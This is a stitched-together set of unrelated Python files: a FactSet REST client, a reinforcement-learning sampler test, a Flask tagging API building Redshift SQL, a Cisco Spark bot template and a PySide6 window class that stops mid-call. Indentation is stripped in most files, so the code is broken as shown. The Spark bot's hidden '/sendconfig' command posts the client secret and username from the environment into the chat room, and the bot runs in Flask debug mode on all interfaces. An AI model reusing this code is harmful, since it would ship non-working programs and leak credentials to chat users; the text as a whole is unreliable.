def rewrite_json_file(file_path, json_data):
    with open(file_path, 'w') as f:
        json.dump(json_data, f, indent=4, ensure_ascii=False)
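# Illustrative sketch (not part of the original module): read a JSON file,
# apply the configured replacements, and write the result back in place.
# The file path below is a placeholder.
def _example_refresh_json():
    path = 'testdata/sample.json'  # hypothetical path
    new_json = get_new_json(path)
    rewrite_json_file(path, new_json)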
|
"""
Documents Distributor - CallStreet Events
CallStreet Events contains all the Documents Distributor APIs that provide events data such as Events Audio and Near Real-Time Transcripts The Events Audio API provides access to all audio recordings to various company events covered by FactSet. The events include, but are not limited to: earnings calls, conferences, and investor days. This API also provides relevant metadata such as timestamps and identifiers around each audio file. The Documents Distributor - Near Real-time Transcripts API enables access to Near Real-time Transcripts provided by CallStreet to time-sensitive clients. This API also provides the relevant speaker metadata along with their confidence scores. This data caters to quant clients interested in building machine learning models. Clients can leverage this API to perform sentiment analysis through natural language processing or machine learning. It can also be used to complement analysis using FactSet's transcripts service. # noqa: E501
The version of the OpenAPI document: 3.0.0
Generated by: https://openapi-generator.tech
"""
import io
import json
import logging
import re
import ssl
from urllib.parse import urlencode
from urllib.parse import urlparse
from urllib.request import proxy_bypass_environment
import urllib3
import ipaddress
from fds.sdk.DocumentsDistributorCallStreetEvents.exceptions import ApiException, UnauthorizedException, ForbiddenException, NotFoundException, ServiceException, ApiValueError
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if configuration.retries is not None:
addition_pool_args['retries'] = configuration.retries
if configuration.socket_options is not None:
addition_pool_args['socket_options'] = configuration.socket_options
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy and not should_bypass_proxies(configuration.host, no_proxy=configuration.no_proxy or ''):
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=configuration.ssl_ca_cert,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
proxy_headers=configuration.proxy_headers,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=configuration.ssl_ca_cert,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ApiValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, float)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
# Only set a default Content-Type for POST, PUT, PATCH and OPTIONS requests
if (method != 'DELETE') and ('Content-Type' not in headers):
headers['Content-Type'] = 'application/json'
if query_params:
url += '?' + urlencode(query_params)
if ('Content-Type' not in headers) or (re.search('json', headers['Content-Type'], re.IGNORECASE)):
request_body = None
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str) or isinstance(body, bytes):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
if r.status == 401:
raise UnauthorizedException(http_resp=r)
if r.status == 403:
raise ForbiddenException(http_resp=r)
if r.status == 404:
raise NotFoundException(http_resp=r)
if 500 <= r.status <= 599:
raise ServiceException(http_resp=r)
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
# end of class RESTClientObject
def is_ipv4(target):
""" Test if IPv4 address or not
"""
try:
        ipaddress.IPv4Address(target)
return True
except ipaddress.AddressValueError:
return False
def in_ipv4net(target, net):
""" Test if target belongs to given IPv4 network
"""
try:
nw = ipaddress.IPv4Network(net)
ip = ipaddress.IPv4Address(target)
if ip in nw:
return True
return False
except ipaddress.AddressValueError:
return False
except ipaddress.NetmaskValueError:
return False
def should_bypass_proxies(url, no_proxy=None):
""" Yet another requests.should_bypass_proxies
Test if proxies should not be used for a particular url.
"""
parsed = urlparse(url)
# special cases
if parsed.hostname in [None, '']:
return True
    # special cases
    if no_proxy in [None, '']:
        return False
    if no_proxy == '*':
        return True
    no_proxy = no_proxy.lower().replace(' ', '')
entries = (
host for host in no_proxy.split(',') if host
)
if is_ipv4(parsed.hostname):
for item in entries:
if in_ipv4net(parsed.hostname, item):
return True
return proxy_bypass_environment(parsed.hostname, {'no': no_proxy} )
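# Illustrative examples (not part of the generated client): how
# should_bypass_proxies() treats a few no_proxy values. The hosts and network
# shown here are placeholders.
def _example_should_bypass_proxies():
    assert should_bypass_proxies('http://anything.example', no_proxy='*')
    assert should_bypass_proxies('http://10.0.0.5/api', no_proxy='10.0.0.0/8')
    assert not should_bypass_proxies('http://api.factset.com', no_proxy='')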
|
from dowel import logger
import numpy as np
from garage.sampler.utils import truncate_paths
from tests.fixtures.logger import NullOutput
class TestSampler:
def setup_method(self):
logger.add_output(NullOutput())
def teardown_method(self):
logger.remove_all()
def test_truncate_paths(self):
paths = [
dict(
observations=np.zeros((100, 1)),
actions=np.zeros((100, 1)),
rewards=np.zeros(100),
env_infos=dict(),
agent_infos=dict(lala=np.zeros(100)),
),
dict(
observations=np.zeros((50, 1)),
actions=np.zeros((50, 1)),
rewards=np.zeros(50),
env_infos=dict(),
agent_infos=dict(lala=np.zeros(50)),
),
]
truncated = truncate_paths(paths, 130)
assert len(truncated) == 2
assert len(truncated[-1]['observations']) == 30
assert len(truncated[0]['observations']) == 100
# make sure not to change the original one
assert len(paths) == 2
assert len(paths[-1]['observations']) == 50
|
import flask
import itertools
from . import tag_validation
from .entities import Entity, entities_blueprint
from ..api import AlmacenAPI, api
from datetime import datetime
from data_layer import Redshift as SQL
from typing import Any, Dict, List, Optional
from subir import Tagger
time_format = '%Y-%m-%d %H:%M:%S'
tags_blueprint = flask.Blueprint('tags', __name__, url_prefix='/companies/<identifier>/entities/<entity_type>/tags')
# DEPRECATED
# TODO remove this when longcat_ux is updated
def tag_entities_query(company_identifier: str, entity: Entity, entity_array: List[Dict[str, Any]], tag: str, subtag: Optional[str] = None) -> SQL.Query:
upload_group = 'almacen_api {date}'.format(date=datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'))
rows = [[company_identifier, c['app'], c['channel'], str(c[entity.id_column_name]), tag, subtag, upload_group] for c in entity_array]
format_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
merge_query = SQL.MergeQuery(
join_columns=['channel', entity.id_column_name],
update_columns=[*entity.tag_column_names, 'upload_group'],
source_table=entity.temp_tag_table_name,
target_table=entity.target_tag_table_name,
source_schema=None,
target_schema=company_identifier
)
return SQL.Query(f'''
create temp table {entity.temp_tag_table_name} (like {company_identifier}.{entity.target_tag_table_name});
insert into {entity.temp_tag_table_name} (company_identifier, app, channel, {entity.id_column_name}, {','.join(entity.tag_column_names)}, upload_group)
values {format_rows};
{merge_query.query};
drop table {entity.temp_tag_table_name};
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows)) + merge_query.substitution_parameters
)
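# Illustrative sketch (not part of the original module): the query built above
# follows a four-step pattern -- create a temp table shaped like the target tag
# table, insert the new rows, merge them into the target on (channel, <id column>),
# then drop the temp table. The entity type, id column name and values below are
# placeholders for demonstration only.
def _example_tag_entities_query():
    entity = Entity.from_plural('campaigns')  # hypothetical entity type
    query = tag_entities_query(
        company_identifier='acme',
        entity=entity,
        entity_array=[{'app': 'app1', 'channel': 'google', 'campaign_id': '42'}],
        tag='brand',
        subtag='search',
    )
    return query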
def subtag_entities_query(company_identifier: str, entity: Entity, entity_array: List[Dict[str, Any]], subtag: str) -> SQL.Query:
upload_group = 'almacen_api {date}'.format(date=datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'))
rows = [[company_identifier, c['app'], c['channel'], str(c[entity.id_column_name]), subtag, upload_group] for c in entity_array]
format_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
merge_query = SQL.MergeQuery(
join_columns=['channel', entity.id_column_name],
update_columns=[entity.subtag_column_name, 'upload_group'],
source_table=entity.temp_tag_table_name,
target_table=entity.target_tag_table_name,
source_schema=None,
target_schema=company_identifier
)
return SQL.Query(f'''
create temp table {entity.temp_tag_table_name} (like {company_identifier}.{entity.target_tag_table_name});
insert into {entity.temp_tag_table_name} (company_identifier, app, channel, {entity.id_column_name}, {entity.subtag_column_name}, upload_group)
values {format_rows};
{merge_query.query};
drop table {entity.temp_tag_table_name};
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows)) + merge_query.substitution_parameters
)
def primary_tag_entities_query(company_identifier: str, entity: Entity, entity_array: List[Dict[str, Any]], tag: str) -> SQL.Query:
upload_group = 'almacen_api {date}'.format(date=datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'))
rows = [[company_identifier, c['app'], c['channel'], str(c[entity.id_column_name]), tag, upload_group] for c in entity_array]
format_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
merge_query = SQL.MergeQuery(
join_columns=['channel', entity.id_column_name],
update_columns=[entity.primary_tag_column_name, 'upload_group'],
source_table=entity.temp_tag_table_name,
target_table=entity.target_tag_table_name,
source_schema=None,
target_schema=company_identifier
)
return SQL.Query(f'''
create temp table {entity.temp_tag_table_name} (like {company_identifier}.{entity.target_tag_table_name});
insert into {entity.temp_tag_table_name} (company_identifier, app, channel, {entity.id_column_name}, {entity.primary_tag_column_name}, upload_group)
values {format_rows};
{merge_query.query};
drop table {entity.temp_tag_table_name};
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows)) + merge_query.substitution_parameters
)
def delete_tag_entities_query(company_identifier: str, entity: Entity, entities_array: List[Dict[str, Any]]) -> SQL.Query:
rows = [[c['channel'], str(c[entity.id_column_name])] for c in entities_array]
formatted_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
return SQL.Query(f'''
delete from {company_identifier}.{entity.target_tag_table_name}
where (channel, {entity.id_column_name}) in ({formatted_rows});
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows))
)
def update_cube_entity_tags_query(company_identifier: str, entity: Entity) -> SQL.Query:
return SQL.Query(f'''
begin transaction;
update {company_identifier}.performance_cube_filtered
set {', '.join(f'{c} = null' for c in entity.tag_column_names)};
update {company_identifier}.performance_cube_filtered
set {', '.join(f'{c} = t.{c}' for c in entity.tag_column_names)}
from {company_identifier}.{entity.target_tag_table_name} as t
where {company_identifier}.performance_cube_filtered.channel = t.channel
and {company_identifier}.performance_cube_filtered.{entity.id_column_name} = t.{entity.id_column_name};
end transaction;
'''
)
# DEPRECATED
# TODO remove this when longcat_ux is updated
@tags_blueprint.route('', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def tag_entities(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.patch_schema(entity)
)
query = tag_entities_query(
company_identifier=identifier,
entity=entity,
entity_array=body[entity.plural],
tag=body['tag'],
subtag=body['subtag'] if 'subtag' in body else None
)
return api.run_query(query)
@tags_blueprint.route('/primary', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def primary_tag_entities(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.patch_primary_tag_schema(entity)
)
query = primary_tag_entities_query(
company_identifier=identifier,
entity=entity,
entity_array=body[entity.plural],
tag=body['tag'],
)
return api.run_query(query)
@tags_blueprint.route('/subtag', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def subtag_entities(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.patch_subtag_schema(entity)
)
query = subtag_entities_query(
company_identifier=identifier,
entity=entity,
entity_array=body[entity.plural],
subtag=body['subtag']
)
return api.run_query(query)
@tags_blueprint.route('/delete', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def delete_tags(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.delete_schema(entity)
)
query = delete_tag_entities_query(
company_identifier=identifier,
entity=entity,
entities_array=body[entity.plural]
)
return api.run_query(query)
@tags_blueprint.route('/csv/merge', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def merge_tags_csv(identifier: str, entity_type: str):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
file = api.get_file(key='csv_file')
tagger = Tagger()
applied_count = tagger.apply_tags(
schema_name=identifier,
entity_name=entity.value,
should_drop=False,
should_purge=True,
csv_stream=file,
file_name=file.filename
)
return flask.jsonify({
'success': applied_count > 0,
'message': f'{applied_count} tags applied.',
})
@tags_blueprint.route('/update/cube', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def update_cube(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
query = update_cube_entity_tags_query(
company_identifier=identifier,
entity=entity
)
return api.run_query(query)
|
#! /usr/bin/python
"""
boilerplate_sparkbot
This is a sample boilerplate application that provides the framework to quickly
build and deploy an interactive Spark Bot.
There are different strategies for building a Spark Bot. You can either create
a new dedicated Spark Account for the bot, or create an "Bot Account" underneath
another Spark Account. Either type will work with this boilerplate, just be sure
to provide the correct token and email account in the configuration.
This Bot will use a provided Spark Account (identified by the Developer Token)
and create a webhook to receive all messages sent to the account. You will
specify a set of command words that the Bot will "listen" for. Any other message
sent to the bot will result in the help message being sent back.
The bot is designed to be deployed as a Docker Container, and can run on any
platform supporting Docker Containers. Mantl.io is one example of a platform
that can be used to run the bot.
There are several pieces of information needed to run this application. These
details can be provided as Environment Variables to the application. The Spark
token and email address can alternatively be provided/updated via a POST request to /config.
If you are running the python application directly, you can set them like this:
# Details on the Cisco Spark Account to Use
export SPARK_BOT_EMAIL=myhero.demo@domain.com
export SPARK_BOT_TOKEN=adfiafdadfadfaij12321kaf
# Public Address and Name for the Spark Bot Application
export SPARK_BOT_URL=http://myhero-spark.mantl.domain.com
export SPARK_BOT_APP_NAME="imapex bot"
If you are running the bot within a docker container, they would be set like this:
# ToDo - Add docker run command
docker run -it --name sparkbot \
-e "SPARK_BOT_EMAIL=myhero.demo@domain.com" \
-e "SPARK_BOT_TOKEN=adfiafdadfadfaij12321kaf" \
-e "SPARK_BOT_URL=http://myhero-spark.mantl.domain.com" \
-e "SPARK_BOT_APP_NAME='imapex bot'" \
sparkbot
# ToDo - API call for configuring the Spark info
In cases where storing the Spark Email and Token as Environment Variables could
be a security risk, you can alternatively set them via a REST request.
curl -X POST http://localhost:5000/config \
-d "{\"SPARK_BOT_TOKEN\": \"<TOKEN>\", \"SPARK_BOT_EMAIL\": \"<EMAIL>"}"
You can read the configuration details with this request
curl http://localhost:5000/config
"""
from flask import Flask, request
from ciscosparkapi import CiscoSparkAPI
import os
import sys
import json
from ccw.ccwparser import *
from ccw.ccwquery import *
# Create the Flask application that provides the bot foundation
app = Flask(__name__)
# The list of commands the bot listens for
# Each key in the dictionary is a command
# The value is the help message sent for the command
commands = {
"/echo": "Reply back with the same message sent.",
"/showconfig": "Shows current configuration.",
"/help": "Get help."
}
# Not strictly needed for most bots, but this allows for requests to be sent
# to the bot from other web sites. "CORS" Requests
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers',
'Content-Type,Authorization,Key')
response.headers.add('Access-Control-Allow-Methods',
'GET,PUT,POST,DELETE,OPTIONS')
return response
# Entry point for Spark Webhooks
@app.route('/', methods=["POST"])
def process_webhook():
# Check if the Spark connection has been made
if spark is None:
sys.stderr.write("Bot not ready. \n")
return "Spark Bot not ready. "
post_data = request.get_json(force=True)
# Uncomment to debug
# sys.stderr.write("Webhook content:" + "\n")
# sys.stderr.write(str(post_data) + "\n")
# Take the posted data and send to the processing function
process_incoming_message(post_data)
return ""
# Config Endpoint to set Spark Details
@app.route('/config', methods=["GET", "POST"])
def config_bot():
if request.method == "POST":
post_data = request.get_json(force=True)
# Verify that a token and email were both provided
if "SPARK_BOT_TOKEN" not in post_data.keys() or "SPARK_BOT_EMAIL" not in post_data.keys():
return "Error: POST Requires both 'SPARK_BOT_TOKEN' and 'SPARK_BOT_EMAIL' to be provided."
# Setup Spark
spark_setup(post_data["SPARK_BOT_EMAIL"], post_data["SPARK_BOT_TOKEN"])
# Return the config detail to API requests
config_data = {
"SPARK_BOT_EMAIL": bot_email,
"SPARK_BOT_TOKEN": spark_token,
"SPARK_BOT_URL": bot_url,
"SPARKBOT_APP_NAME": bot_app_name
}
config_data["SPARK_BOT_TOKEN"] = "REDACTED" # Used to hide the token from requests.
return json.dumps(config_data)
# Quick REST API to have bot send a message to a user
@app.route("/hello/<email>", methods=["GET"])
def message_email(email):
"""
Kickoff a 1 on 1 chat with a given email
:param email:
:return:
"""
# Check if the Spark connection has been made
if spark is None:
sys.stderr.write("Bot not ready. \n")
return "Spark Bot not ready. "
# send_message_to_email(email, "Hello!")
spark.messages.create(toPersonEmail=email, markdown="Hello!")
return "Message sent to " + email
# Health Check
@app.route("/health", methods=["GET"])
def health_check():
"""
Notify if bot is up
:return:
"""
return "Up and healthy"
# Function to Setup the WebHook for the bot
def setup_webhook(name, targeturl):
# Get a list of current webhooks
webhooks = spark.webhooks.list()
# Look for a Webhook for this bot_name
    # Need try block because if there are NO webhooks it throws an error
    wh = None
    try:
for h in webhooks: # Efficiently iterates through returned objects
if h.name == name:
sys.stderr.write("Found existing webhook. Updating it.\n")
wh = spark.webhooks.update(webhookId=h.id, name=name, targetUrl=targeturl)
# Stop searching
break
# If there wasn't a Webhook found
if wh is None:
sys.stderr.write("Creating new webhook.\n")
wh = spark.webhooks.create(name=name, targetUrl=targeturl, resource="messages", event="created")
except:
sys.stderr.write("Creating new webhook.\n")
wh = spark.webhooks.create(name=name, targetUrl=targeturl, resource="messages", event="created")
return wh
# Function to take action on incoming message
def process_incoming_message(post_data):
# Determine the Spark Room to send reply to
room_id = post_data["data"]["roomId"]
# Get the details about the message that was sent.
message_id = post_data["data"]["id"]
message = spark.messages.get(message_id)
# Uncomment to debug
# sys.stderr.write("Message content:" + "\n")
# sys.stderr.write(str(message) + "\n")
# First make sure not processing a message from the bot
if message.personEmail in spark.people.me().emails:
# Uncomment to debug
# sys.stderr.write("Message from bot recieved." + "\n")
return ""
# Log details on message
sys.stderr.write("Message from: " + message.personEmail + "\n")
# Find the command that was sent, if any
command = ""
for c in commands.items():
if message.text.find(c[0]) != -1:
command = c[0]
sys.stderr.write("Found command: " + command + "\n")
# If a command was found, stop looking for others
break
reply = ""
# Take action based on command
# If no command found, send help
if command in ["", "/help"]:
reply = send_help(post_data)
elif command in ["/sendconfig"]:
reply = send_config(post_data)
elif command in ["/echo"]:
reply = send_echo(message)
# send_message_to_room(room_id, reply)
spark.messages.create(roomId=room_id, markdown=reply)
# Sample command function that just echos back the sent message
def send_echo(incoming):
# Get sent message
message = extract_message("/echo", incoming.text)
return message
# Construct a help message for users.
def send_help(post_data):
message = "Hello! "
message = message + "I understand the following commands: \n"
for c in commands.items():
message = message + "* **%s**: %s \n" % (c[0], c[1])
return message
# Send Configuration.
def send_config(post_data):
message = "Hello! "
message = message + "Current Configuration is: \n"
message = message + "API Client ID: "+os.environ.get("CLIENT_ID") + "\n"
message = message + "API Client Secret: "+os.environ.get("CLIENT_SECRET") + "\n"
message = message + "CEC Username: "+os.environ.get("CEC_USERID") + "\n"
return message
# Return contents following a given command
def extract_message(command, text):
cmd_loc = text.find(command)
message = text[cmd_loc + len(command):]
return message
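# Illustrative example (not part of the original bot): extract_message() strips
# the command word and returns the remainder of the text, e.g.
#   extract_message("/echo", "/echo Hello there") == " Hello there"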
# Setup the Spark connection and WebHook
def spark_setup(email, token):
# Update the global variables for config details
globals()["spark_token"] = token
globals()["bot_email"] = email
sys.stderr.write("Spark Bot Email: " + bot_email + "\n")
sys.stderr.write("Spark Token: REDACTED\n")
# Setup the Spark Connection
globals()["spark"] = CiscoSparkAPI(access_token=globals()["spark_token"])
globals()["webhook"] = setup_webhook(globals()["bot_app_name"], globals()["bot_url"])
sys.stderr.write("Configuring Webhook. \n")
sys.stderr.write("Webhook ID: " + globals()["webhook"].id + "\n")
if __name__ == '__main__':
# Entry point for bot
# Retrieve needed details from environment for the bot
bot_email = os.getenv("SPARK_BOT_EMAIL")
spark_token = os.getenv("SPARK_BOT_TOKEN")
bot_url = os.getenv("SPARK_BOT_URL")
bot_app_name = os.getenv("SPARK_BOT_APP_NAME")
client_id = os.getenv("CLIENT_ID")
client_secret = os.getenv("CLIENT_SECRET")
cec_username = os.getenv("CEC_USERID")
cec_password = os.getenv("CEC_PASSWORD")
# bot_url and bot_app_name must come in from Environment Variables
if bot_url is None or bot_app_name is None:
sys.exit("Missing required argument. Must set 'SPARK_BOT_URL' and 'SPARK_BOT_APP_NAME' in ENV.")
# Write the details out to the console
sys.stderr.write("Spark Bot URL (for webhook): " + bot_url + "\n")
sys.stderr.write("Spark Bot App Name: " + bot_app_name + "\n")
# Placeholder variables for spark connection objects
spark = None
webhook = None
# Check if the token and email were set in ENV
if spark_token is None or bot_email is None:
sys.stderr.write("Spark Config is missing, please provide via API. Bot not ready.\n")
else:
spark_setup(bot_email, spark_token)
spark = CiscoSparkAPI(access_token=spark_token)
app.run(debug=True, host='0.0.0.0', port=int("5000"))
|
# ///////////////////////////////////////////////////////////////
#
# BY: WANDERSON M.PIMENTA
# PROJECT MADE WITH: Qt Designer and PySide6
# V: 1.0.0
#
# This project can be used freely for all uses, as long as they maintain the
# respective credits only in the Python scripts, any information in the visual
# interface (GUI) can be modified without any implication.
#
# There are limitations on Qt licenses if you want to use your products
# commercially, I recommend reading them on the official website:
# https://doc.qt.io/qtforpython/licenses.html
#
# ///////////////////////////////////////////////////////////////
# IMPORT PACKAGES AND MODULES
# ///////////////////////////////////////////////////////////////
# IMPORT QT CORE
# ///////////////////////////////////////////////////////////////
from qt_core import *
# IMPORT SETTINGS
# ///////////////////////////////////////////////////////////////
from app.gui.core.json_settings import Settings
# IMPORT STYLES
# ///////////////////////////////////////////////////////////////
from . styles import Styles
# PY WINDOW
# ///////////////////////////////////////////////////////////////
class PyWindow(QFrame):
def __init__(
self,
parent,
layout = Qt.Vertical,
margin = 0,
spacing = 2,
bg_color = "#2c313c",
text_color = "#fff",
text_font = "9pt 'Segoe UI'",
border_radius = 10,
border_size = 2,
border_color = "#343b48",
enable_shadow = True
):
super().__init__()
# LOAD SETTINGS
# ///////////////////////////////////////////////////////////////
settings = Settings()
self.settings = settings.items
# PROPERTIES
# ///////////////////////////////////////////////////////////////
self.parent = parent
self.layout = layout
self.margin = margin
self.bg_color = bg_color
self.text_color = text_color
self.text_font = text_font
self.border_radius = border_radius
self.border_size = border_size
self.border_color = border_color
self.enable_shadow = enable_shadow
# OBJECT NAME
# ///////////////////////////////////////////////////////////////
self.setObjectName("pod_bg_app")
# APPLY STYLESHEET
# ///////////////////////////////////////////////////////////////
self.set_stylesheet()
# ADD LAYOUT
# ///////////////////////////////////////////////////////////////
        if layout == Qt.Vertical:
            # VERTICAL LAYOUT
            self.layout = QVBoxLayout(self)
        else:
            # HORIZONTAL LAYOUT
            self.layout = QHBoxLayout(self)
self.layout.setContentsMargins(margin, margin, margin, margin)
self.layout.setSpacing(spacing)
# ADD DROP SHADOW
# ///////////////////////////////////////////////////////////////
if self.settings["custom_title_bar"]:
if enable_shadow:
self.shadow = QGraphicsDropShadowEffect()
self.shadow.setBlurRadius(20)
self.shadow.setXOffset(0)
self.shadow.setYOffset(0)
self.shadow.setColor(QColor(0, 0, 0, 160))
self.setGraphicsEffect(self.shadow)
# APPLY AND UPDATE STYLESHEET
# ///////////////////////////////////////////////////////////////
def set_stylesheet(
self,
bg_color = None,
border_radius = None,
border_size = None,
border_color = None,
text_color = None,
text_font = None
):
        # CHECK BG COLOR
        if bg_color is not None: internal_bg_color = bg_color
        else: internal_bg_color = self.bg_color
        # CHECK BORDER RADIUS
        if border_radius is not None: internal_border_radius = border_radius
        else: internal_border_radius = self.border_radius
        # CHECK BORDER SIZE
        if border_size is not None: internal_border_size = border_size
        else: internal_border_size = self.border_size
        # CHECK TEXT COLOR
        if text_color is not None: internal_text_color = text_color
        else: internal_text_color = self.text_color
        # CHECK BORDER COLOR
        if border_color is not None: internal_border_color = border_color
        else: internal_border_color = self.border_color
        # CHECK TEXT FONT
        if text_font is not None: internal_text_font = text_font
        else: internal_text_font = self.text_font
self.setStyleSheet(Styles.bg_style.format(
_bg_color = internal_bg_color,
